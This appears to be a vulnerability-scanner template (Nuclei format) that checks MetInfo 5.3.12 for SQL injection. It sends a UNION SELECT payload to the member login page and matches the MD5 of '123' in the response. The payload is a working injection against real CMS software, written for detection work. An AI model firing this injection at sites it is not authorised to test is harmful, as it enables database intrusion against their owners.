id: MetInfo-sqli

info:
  name: MetInfo 5.3.12注入漏洞
  author: Str1am
  severity: medium
  tags: MetInfo,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/member/login.php/aa'UNION%20SELECT%20(md5(123)),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and